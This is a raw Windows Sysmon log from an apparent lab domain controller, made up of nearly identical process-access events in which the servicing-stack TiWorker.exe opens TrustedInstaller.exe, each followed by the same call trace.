13:30:30.076{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012666Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.060{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012665Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.060{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012664Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.060{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012663Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.060{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012662Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.060{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012661Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.045{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012660Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.045{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012659Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.045{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012658Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.045{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012657Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.045{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012656Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.029{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012655Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.029{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012654Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.013{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012653Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.013{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012652Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:29.998{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012651Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:29.998{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012650Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:29.998{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012812Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 